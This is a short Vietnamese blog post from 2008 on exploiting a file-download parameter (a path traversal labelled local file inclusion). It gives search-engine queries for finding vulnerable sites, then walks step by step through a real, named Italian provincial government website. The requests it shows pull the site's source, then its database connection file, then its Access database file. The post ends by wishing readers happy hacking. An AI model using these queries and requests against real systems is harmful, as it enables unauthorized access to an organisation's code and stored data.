Portfolio
My Blog
Scroll down to discover
Search
Categories

Local File Inclusion

June 10, 2008Category : Bug & Security

Google gõ keyword:
allinurl: “download.asp?file=”
allinurl: “dl.asp?file=”
ra hàng loạt , lấy thằng này làm ví dụ nhé .
http://www.provincia.so.it/download.asp?file=
thêm default.asp vào
http://www.provincia.so.it/download.asp?file=default.asp
down cái file đó về mở ra thấy
<!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–>
thay tiếp vào đường dẫn vào
http://www.provincia.so.it/download.asp?file=include/connettiDB.asp
ồi tiếp tục down cái file đó về mở ra thấy
percorsoDatabase=”/database/DBSito.mdb
giờ thì xong rồi
http://www.provincia.so.it/download.asp?file=database/DBSito.mdb
Hack vui vẻ . Áp dụng luôn cho cả mã nguồn php .

01.
© Oliver / All rights reserved.
To top